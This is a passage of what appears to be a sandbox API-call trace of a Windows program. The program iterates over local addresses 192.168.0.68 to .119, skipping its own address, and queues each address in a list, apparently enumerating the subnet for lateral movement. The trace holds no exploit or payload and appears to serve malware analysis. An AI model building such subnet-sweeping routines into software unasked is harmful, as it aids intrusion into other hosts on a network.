0x3980c80 [0095.947] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.68") returned 12 [0095.947] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.68") returned -1 [0095.947] malloc (_Size=0x1c) returned 0x3980d00 [0095.947] lstrcpyA (in: lpString1=0x3980d04, lpString2="192.168.0.68" | out: lpString1="192.168.0.68") returned="192.168.0.68" [0095.947] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980d00 | out: ListHead=0x2064bd0, ListEntry=0x3980d00) returned 0x3980cd8 [0095.947] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.69") returned 12 [0095.947] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.69") returned -1 [0095.947] malloc (_Size=0x1c) returned 0x3980d28 [0095.947] lstrcpyA (in: lpString1=0x3980d2c, lpString2="192.168.0.69" | out: lpString1="192.168.0.69") returned="192.168.0.69" [0095.947] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980d28 | out: ListHead=0x2064bd0, ListEntry=0x3980d28) returned 0x3980d00 [0095.947] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.70") returned 12 [0095.947] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.70") returned -1 [0095.948] malloc (_Size=0x1c) returned 0x3980d50 [0095.948] lstrcpyA (in: lpString1=0x3980d54, lpString2="192.168.0.70" | out: lpString1="192.168.0.70") returned="192.168.0.70" [0095.948] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980d50 | out: ListHead=0x2064bd0, ListEntry=0x3980d50) returned 0x3980d28 [0095.948] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.71") returned 12 [0095.948] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.71") returned -1 [0095.948] malloc (_Size=0x1c) returned 0x3980d78 [0095.948] lstrcpyA (in: lpString1=0x3980d7c, lpString2="192.168.0.71" | out: lpString1="192.168.0.71") returned="192.168.0.71" [0095.948] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980d78 | out: ListHead=0x2064bd0, ListEntry=0x3980d78) returned 0x3980d50 [0095.948] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.72") returned 12 [0095.948] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.72") returned -1 [0095.948] malloc (_Size=0x1c) returned 0x3980da0 [0095.948] lstrcpyA (in: lpString1=0x3980da4, lpString2="192.168.0.72" | out: lpString1="192.168.0.72") returned="192.168.0.72" [0095.948] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980da0 | out: ListHead=0x2064bd0, ListEntry=0x3980da0) returned 0x3980d78 [0095.948] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.73") returned 12 [0095.948] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.73") returned -1 [0095.948] malloc (_Size=0x1c) returned 0x3980dc8 [0095.948] lstrcpyA (in: lpString1=0x3980dcc, lpString2="192.168.0.73" | out: lpString1="192.168.0.73") returned="192.168.0.73" [0095.948] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980dc8 | out: ListHead=0x2064bd0, ListEntry=0x3980dc8) returned 0x3980da0 [0095.948] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.74") returned 12 [0095.948] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.74") returned -1 [0095.948] malloc (_Size=0x1c) returned 0x3980df0 [0095.948] lstrcpyA (in: lpString1=0x3980df4, lpString2="192.168.0.74" | out: lpString1="192.168.0.74") returned="192.168.0.74" [0095.948] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980df0 | out: ListHead=0x2064bd0, ListEntry=0x3980df0) returned 0x3980dc8 [0095.948] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.75") returned 12 [0095.948] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.75") returned -1 [0095.948] malloc (_Size=0x1c) returned 0x3980e18 [0095.948] lstrcpyA (in: lpString1=0x3980e1c, lpString2="192.168.0.75" | out: lpString1="192.168.0.75") returned="192.168.0.75" [0095.948] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980e18 | out: ListHead=0x2064bd0, ListEntry=0x3980e18) returned 0x3980df0 [0095.948] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.76") returned 12 [0095.948] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.76") returned -1 [0095.948] malloc (_Size=0x1c) returned 0x3980e40 [0095.949] lstrcpyA (in: lpString1=0x3980e44, lpString2="192.168.0.76" | out: lpString1="192.168.0.76") returned="192.168.0.76" [0095.949] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980e40 | out: ListHead=0x2064bd0, ListEntry=0x3980e40) returned 0x3980e18 [0095.949] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.77") returned 12 [0095.949] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.77") returned -1 [0095.949] malloc (_Size=0x1c) returned 0x3980e68 [0095.949] lstrcpyA (in: lpString1=0x3980e6c, lpString2="192.168.0.77" | out: lpString1="192.168.0.77") returned="192.168.0.77" [0095.949] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980e68 | out: ListHead=0x2064bd0, ListEntry=0x3980e68) returned 0x3980e40 [0095.949] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.78") returned 12 [0095.949] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.78") returned -1 [0095.949] malloc (_Size=0x1c) returned 0x3980e90 [0095.949] lstrcpyA (in: lpString1=0x3980e94, lpString2="192.168.0.78" | out: lpString1="192.168.0.78") returned="192.168.0.78" [0095.949] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980e90 | out: ListHead=0x2064bd0, ListEntry=0x3980e90) returned 0x3980e68 [0095.949] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.79") returned 12 [0095.949] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.79") returned -1 [0095.949] malloc (_Size=0x1c) returned 0x3980eb8 [0095.949] lstrcpyA (in: lpString1=0x3980ebc, lpString2="192.168.0.79" | out: lpString1="192.168.0.79") returned="192.168.0.79" [0095.949] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980eb8 | out: ListHead=0x2064bd0, ListEntry=0x3980eb8) returned 0x3980e90 [0095.949] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.80") returned 12 [0095.949] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.80") returned -1 [0095.949] malloc (_Size=0x1c) returned 0x3980ee0 [0095.949] lstrcpyA (in: lpString1=0x3980ee4, lpString2="192.168.0.80" | out: lpString1="192.168.0.80") returned="192.168.0.80" [0095.949] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980ee0 | out: ListHead=0x2064bd0, ListEntry=0x3980ee0) returned 0x3980eb8 [0095.949] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.81") returned 12 [0095.949] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.81") returned -1 [0095.949] malloc (_Size=0x1c) returned 0x3980f08 [0095.949] lstrcpyA (in: lpString1=0x3980f0c, lpString2="192.168.0.81" | out: lpString1="192.168.0.81") returned="192.168.0.81" [0095.949] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980f08 | out: ListHead=0x2064bd0, ListEntry=0x3980f08) returned 0x3980ee0 [0095.949] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.82") returned 12 [0095.949] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.82") returned -1 [0095.950] malloc (_Size=0x1c) returned 0x3980f30 [0095.950] lstrcpyA (in: lpString1=0x3980f34, lpString2="192.168.0.82" | out: lpString1="192.168.0.82") returned="192.168.0.82" [0095.950] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980f30 | out: ListHead=0x2064bd0, ListEntry=0x3980f30) returned 0x3980f08 [0095.950] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.83") returned 12 [0095.950] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.83") returned -1 [0095.950] malloc (_Size=0x1c) returned 0x3980f58 [0095.950] lstrcpyA (in: lpString1=0x3980f5c, lpString2="192.168.0.83" | out: lpString1="192.168.0.83") returned="192.168.0.83" [0095.950] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980f58 | out: ListHead=0x2064bd0, ListEntry=0x3980f58) returned 0x3980f30 [0095.950] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.84") returned 12 [0095.950] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.84") returned -1 [0095.950] malloc (_Size=0x1c) returned 0x3980f80 [0095.950] lstrcpyA (in: lpString1=0x3980f84, lpString2="192.168.0.84" | out: lpString1="192.168.0.84") returned="192.168.0.84" [0095.950] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980f80 | out: ListHead=0x2064bd0, ListEntry=0x3980f80) returned 0x3980f58 [0095.950] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.85") returned 12 [0095.950] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.85") returned -1 [0095.950] malloc (_Size=0x1c) returned 0x3980fa8 [0095.950] lstrcpyA (in: lpString1=0x3980fac, lpString2="192.168.0.85" | out: lpString1="192.168.0.85") returned="192.168.0.85" [0095.950] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980fa8 | out: ListHead=0x2064bd0, ListEntry=0x3980fa8) returned 0x3980f80 [0095.950] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.86") returned 12 [0095.950] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.86") returned -1 [0095.950] malloc (_Size=0x1c) returned 0x3980fd0 [0095.950] lstrcpyA (in: lpString1=0x3980fd4, lpString2="192.168.0.86" | out: lpString1="192.168.0.86") returned="192.168.0.86" [0095.950] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980fd0 | out: ListHead=0x2064bd0, ListEntry=0x3980fd0) returned 0x3980fa8 [0095.950] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.87") returned 12 [0095.950] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.87") returned -1 [0095.950] malloc (_Size=0x1c) returned 0x3980ff8 [0095.950] lstrcpyA (in: lpString1=0x3980ffc, lpString2="192.168.0.87" | out: lpString1="192.168.0.87") returned="192.168.0.87" [0095.950] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3980ff8 | out: ListHead=0x2064bd0, ListEntry=0x3980ff8) returned 0x3980fd0 [0095.951] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.88") returned 12 [0095.951] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.88") returned -1 [0095.951] malloc (_Size=0x1c) returned 0x3981020 [0095.951] lstrcpyA (in: lpString1=0x3981024, lpString2="192.168.0.88" | out: lpString1="192.168.0.88") returned="192.168.0.88" [0095.951] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981020 | out: ListHead=0x2064bd0, ListEntry=0x3981020) returned 0x3980ff8 [0095.951] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.89") returned 12 [0095.951] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.89") returned -1 [0095.951] malloc (_Size=0x1c) returned 0x3981048 [0095.951] lstrcpyA (in: lpString1=0x398104c, lpString2="192.168.0.89" | out: lpString1="192.168.0.89") returned="192.168.0.89" [0095.951] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981048 | out: ListHead=0x2064bd0, ListEntry=0x3981048) returned 0x3981020 [0095.951] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.90") returned 12 [0095.951] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.90") returned -1 [0095.951] malloc (_Size=0x1c) returned 0x3981070 [0095.951] lstrcpyA (in: lpString1=0x3981074, lpString2="192.168.0.90" | out: lpString1="192.168.0.90") returned="192.168.0.90" [0095.951] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981070 | out: ListHead=0x2064bd0, ListEntry=0x3981070) returned 0x3981048 [0095.951] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.91") returned 12 [0095.951] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.91") returned -1 [0095.951] malloc (_Size=0x1c) returned 0x3981098 [0095.951] lstrcpyA (in: lpString1=0x398109c, lpString2="192.168.0.91" | out: lpString1="192.168.0.91") returned="192.168.0.91" [0095.951] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981098 | out: ListHead=0x2064bd0, ListEntry=0x3981098) returned 0x3981070 [0095.951] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.92") returned 12 [0095.951] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.92") returned -1 [0095.951] malloc (_Size=0x1c) returned 0x39810c0 [0095.951] lstrcpyA (in: lpString1=0x39810c4, lpString2="192.168.0.92" | out: lpString1="192.168.0.92") returned="192.168.0.92" [0095.951] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39810c0 | out: ListHead=0x2064bd0, ListEntry=0x39810c0) returned 0x3981098 [0095.951] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.93") returned 12 [0095.951] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.93") returned -1 [0095.951] malloc (_Size=0x1c) returned 0x39810e8 [0095.951] lstrcpyA (in: lpString1=0x39810ec, lpString2="192.168.0.93" | out: lpString1="192.168.0.93") returned="192.168.0.93" [0095.952] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39810e8 | out: ListHead=0x2064bd0, ListEntry=0x39810e8) returned 0x39810c0 [0095.952] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.94") returned 12 [0095.952] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.94") returned -1 [0095.952] malloc (_Size=0x1c) returned 0x3981110 [0095.952] lstrcpyA (in: lpString1=0x3981114, lpString2="192.168.0.94" | out: lpString1="192.168.0.94") returned="192.168.0.94" [0095.952] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981110 | out: ListHead=0x2064bd0, ListEntry=0x3981110) returned 0x39810e8 [0095.952] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.95") returned 12 [0095.952] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.95") returned -1 [0095.952] malloc (_Size=0x1c) returned 0x3981138 [0095.952] lstrcpyA (in: lpString1=0x398113c, lpString2="192.168.0.95" | out: lpString1="192.168.0.95") returned="192.168.0.95" [0095.952] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981138 | out: ListHead=0x2064bd0, ListEntry=0x3981138) returned 0x3981110 [0095.952] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.96") returned 12 [0095.952] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.96") returned -1 [0095.952] malloc (_Size=0x1c) returned 0x3981160 [0095.952] lstrcpyA (in: lpString1=0x3981164, lpString2="192.168.0.96" | out: lpString1="192.168.0.96") returned="192.168.0.96" [0095.952] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981160 | out: ListHead=0x2064bd0, ListEntry=0x3981160) returned 0x3981138 [0095.952] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.97") returned 12 [0095.952] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.97") returned -1 [0095.952] malloc (_Size=0x1c) returned 0x3981188 [0095.952] lstrcpyA (in: lpString1=0x398118c, lpString2="192.168.0.97" | out: lpString1="192.168.0.97") returned="192.168.0.97" [0095.952] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981188 | out: ListHead=0x2064bd0, ListEntry=0x3981188) returned 0x3981160 [0095.952] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.98") returned 12 [0095.952] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.98") returned -1 [0095.952] malloc (_Size=0x1c) returned 0x39811b0 [0095.952] lstrcpyA (in: lpString1=0x39811b4, lpString2="192.168.0.98" | out: lpString1="192.168.0.98") returned="192.168.0.98" [0095.952] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39811b0 | out: ListHead=0x2064bd0, ListEntry=0x39811b0) returned 0x3981188 [0095.952] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.99") returned 12 [0095.952] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.99") returned -1 [0095.952] malloc (_Size=0x1c) returned 0x39811d8 [0095.953] lstrcpyA (in: lpString1=0x39811dc, lpString2="192.168.0.99" | out: lpString1="192.168.0.99") returned="192.168.0.99" [0095.953] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39811d8 | out: ListHead=0x2064bd0, ListEntry=0x39811d8) returned 0x39811b0 [0095.953] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.100") returned 13 [0095.953] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.100") returned 1 [0095.953] malloc (_Size=0x1c) returned 0x3981200 [0095.953] lstrcpyA (in: lpString1=0x3981204, lpString2="192.168.0.100" | out: lpString1="192.168.0.100") returned="192.168.0.100" [0095.953] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981200 | out: ListHead=0x2064bd0, ListEntry=0x3981200) returned 0x39811d8 [0095.953] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.101") returned 13 [0095.953] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.101") returned 1 [0095.953] malloc (_Size=0x1c) returned 0x3981228 [0095.953] lstrcpyA (in: lpString1=0x398122c, lpString2="192.168.0.101" | out: lpString1="192.168.0.101") returned="192.168.0.101" [0095.953] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981228 | out: ListHead=0x2064bd0, ListEntry=0x3981228) returned 0x3981200 [0095.953] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.102") returned 13 [0095.953] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.102") returned 1 [0095.953] malloc (_Size=0x1c) returned 0x3981250 [0095.953] lstrcpyA (in: lpString1=0x3981254, lpString2="192.168.0.102" | out: lpString1="192.168.0.102") returned="192.168.0.102" [0095.953] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981250 | out: ListHead=0x2064bd0, ListEntry=0x3981250) returned 0x3981228 [0095.953] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.103") returned 13 [0095.953] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.103") returned 1 [0095.953] malloc (_Size=0x1c) returned 0x3981278 [0095.953] lstrcpyA (in: lpString1=0x398127c, lpString2="192.168.0.103" | out: lpString1="192.168.0.103") returned="192.168.0.103" [0095.953] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981278 | out: ListHead=0x2064bd0, ListEntry=0x3981278) returned 0x3981250 [0095.953] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.104") returned 13 [0095.953] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.104") returned 1 [0095.953] malloc (_Size=0x1c) returned 0x39812a0 [0095.953] lstrcpyA (in: lpString1=0x39812a4, lpString2="192.168.0.104" | out: lpString1="192.168.0.104") returned="192.168.0.104" [0095.953] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39812a0 | out: ListHead=0x2064bd0, ListEntry=0x39812a0) returned 0x3981278 [0095.953] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.105") returned 13 [0095.953] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.105") returned 1 [0095.953] malloc (_Size=0x1c) returned 0x39812c8 [0095.954] lstrcpyA (in: lpString1=0x39812cc, lpString2="192.168.0.105" | out: lpString1="192.168.0.105") returned="192.168.0.105" [0095.954] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39812c8 | out: ListHead=0x2064bd0, ListEntry=0x39812c8) returned 0x39812a0 [0095.954] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.106") returned 13 [0095.954] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.106") returned 1 [0095.954] malloc (_Size=0x1c) returned 0x39812f0 [0095.954] lstrcpyA (in: lpString1=0x39812f4, lpString2="192.168.0.106" | out: lpString1="192.168.0.106") returned="192.168.0.106" [0095.954] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39812f0 | out: ListHead=0x2064bd0, ListEntry=0x39812f0) returned 0x39812c8 [0095.954] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.107") returned 13 [0095.954] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.107") returned 1 [0095.954] malloc (_Size=0x1c) returned 0x3981318 [0095.954] lstrcpyA (in: lpString1=0x398131c, lpString2="192.168.0.107" | out: lpString1="192.168.0.107") returned="192.168.0.107" [0095.954] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981318 | out: ListHead=0x2064bd0, ListEntry=0x3981318) returned 0x39812f0 [0095.954] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.108") returned 13 [0095.954] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.108") returned 1 [0095.954] malloc (_Size=0x1c) returned 0x3981340 [0095.954] lstrcpyA (in: lpString1=0x3981344, lpString2="192.168.0.108" | out: lpString1="192.168.0.108") returned="192.168.0.108" [0095.954] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981340 | out: ListHead=0x2064bd0, ListEntry=0x3981340) returned 0x3981318 [0095.954] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.109") returned 13 [0095.954] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.109") returned 1 [0095.954] malloc (_Size=0x1c) returned 0x3981368 [0095.954] lstrcpyA (in: lpString1=0x398136c, lpString2="192.168.0.109" | out: lpString1="192.168.0.109") returned="192.168.0.109" [0095.954] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981368 | out: ListHead=0x2064bd0, ListEntry=0x3981368) returned 0x3981340 [0095.954] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.110") returned 13 [0095.954] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.110") returned 1 [0095.954] malloc (_Size=0x1c) returned 0x3981390 [0095.954] lstrcpyA (in: lpString1=0x3981394, lpString2="192.168.0.110" | out: lpString1="192.168.0.110") returned="192.168.0.110" [0095.954] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981390 | out: ListHead=0x2064bd0, ListEntry=0x3981390) returned 0x3981368 [0095.955] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.111") returned 13 [0095.955] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.111") returned 1 [0095.955] malloc (_Size=0x1c) returned 0x39813b8 [0095.955] lstrcpyA (in: lpString1=0x39813bc, lpString2="192.168.0.111" | out: lpString1="192.168.0.111") returned="192.168.0.111" [0095.955] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39813b8 | out: ListHead=0x2064bd0, ListEntry=0x39813b8) returned 0x3981390 [0095.955] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.112") returned 13 [0095.955] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.112") returned 1 [0095.955] malloc (_Size=0x1c) returned 0x39813e0 [0095.955] lstrcpyA (in: lpString1=0x39813e4, lpString2="192.168.0.112" | out: lpString1="192.168.0.112") returned="192.168.0.112" [0095.955] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39813e0 | out: ListHead=0x2064bd0, ListEntry=0x39813e0) returned 0x39813b8 [0095.955] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.113") returned 13 [0095.955] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.113") returned 1 [0095.955] malloc (_Size=0x1c) returned 0x3981408 [0095.955] lstrcpyA (in: lpString1=0x398140c, lpString2="192.168.0.113" | out: lpString1="192.168.0.113") returned="192.168.0.113" [0095.955] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981408 | out: ListHead=0x2064bd0, ListEntry=0x3981408) returned 0x39813e0 [0095.955] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.114") returned 13 [0095.955] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.114") returned 1 [0095.955] malloc (_Size=0x1c) returned 0x3981430 [0095.955] lstrcpyA (in: lpString1=0x3981434, lpString2="192.168.0.114" | out: lpString1="192.168.0.114") returned="192.168.0.114" [0095.955] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981430 | out: ListHead=0x2064bd0, ListEntry=0x3981430) returned 0x3981408 [0095.955] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.115") returned 13 [0095.955] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.115") returned 1 [0095.955] malloc (_Size=0x1c) returned 0x3981458 [0095.955] lstrcpyA (in: lpString1=0x398145c, lpString2="192.168.0.115" | out: lpString1="192.168.0.115") returned="192.168.0.115" [0095.955] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981458 | out: ListHead=0x2064bd0, ListEntry=0x3981458) returned 0x3981430 [0095.956] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.116") returned 13 [0095.956] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.116") returned 1 [0095.956] malloc (_Size=0x1c) returned 0x3981480 [0095.956] lstrcpyA (in: lpString1=0x3981484, lpString2="192.168.0.116" | out: lpString1="192.168.0.116") returned="192.168.0.116" [0095.956] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981480 | out: ListHead=0x2064bd0, ListEntry=0x3981480) returned 0x3981458 [0095.956] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.117") returned 13 [0095.956] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.117") returned 1 [0095.957] malloc (_Size=0x1c) returned 0x39814d8 [0095.957] lstrcpyA (in: lpString1=0x39814dc, lpString2="192.168.0.117" | out: lpString1="192.168.0.117") returned="192.168.0.117" [0095.957] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x39814d8 | out: ListHead=0x2064bd0, ListEntry=0x39814d8) returned 0x3981480 [0095.957] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.118") returned 13 [0095.957] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.118") returned 1 [0095.957] malloc (_Size=0x1c) returned 0x3981500 [0095.957] lstrcpyA (in: lpString1=0x3981504, lpString2="192.168.0.118" | out: lpString1="192.168.0.118") returned="192.168.0.118" [0095.957] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981500 | out: ListHead=0x2064bd0, ListEntry=0x3981500) returned 0x39814d8 [0095.957] wsprintfA (in: param_1=0x31cf9a8, param_2="%s.%d" | out: param_1="192.168.0.119") returned 13 [0095.957] lstrcmpiA (lpString1="192.168.0.236", lpString2="192.168.0.119") returned 1 [0095.957] malloc (_Size=0x1c) returned 0x3981528 [0095.957] lstrcpyA (in: lpString1=0x398152c, lpString2="192.168.0.119" | out: lpString1="192.168.0.119") returned="192.168.0.119" [0095.957] RtlInterlockedPushEntrySList (in: ListHead=0x2064bd0, ListEntry=0x3981528 | out: ListHead=0x2064bd0, 